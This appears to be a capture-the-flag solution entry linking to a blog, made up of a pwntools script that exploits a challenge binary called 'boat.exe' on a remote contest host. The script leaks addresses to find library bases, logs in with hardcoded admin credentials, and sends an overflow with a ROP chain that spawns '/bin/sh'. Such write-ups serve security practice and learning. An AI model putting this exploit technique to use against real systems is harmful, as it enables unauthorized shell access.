Rating: 4.0
> https://uz56764.tistory.com/109
```
from pwn import *
#context.log_level = 'debug'
p = process(["boat.exe","1","4001"])
#p = process(["./start_boats.sh"])
#p = process(["./boat.exe"], env={'LD_PRELOAD':'./libc.so.6'})
p = remote("be.ax", 30190)
p.sendline(b'name boat')
p.sendline(b'a'*7)
lic = u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
ld_base = lic - 0x3b2e0
print(f'ld_base : {hex(ld_base)}')
libc_base = lic - 0x7f32e0
print(f'libc_base : {hex(libc_base)}')
raw_input()
p.sendline(b'.cshelladmin')
p.sendline(b'admin')
p.sendline(b'09sr')
p.sendline(b'send_bin_msg')
p.sendline(b'-80')
p.sendline(b'4001')
p.sendline(b'/bin/sh\x00'+b'a'*0x80+p64(ld_base+0x00000000000054da)+p64(0x0)+p64(ld_base+0x0000000000020342)+p64(0x3b)+p64(0x0)+p64(0x0)+p64(ld_base+0x000000000000cbc6))
p.interactive()
```
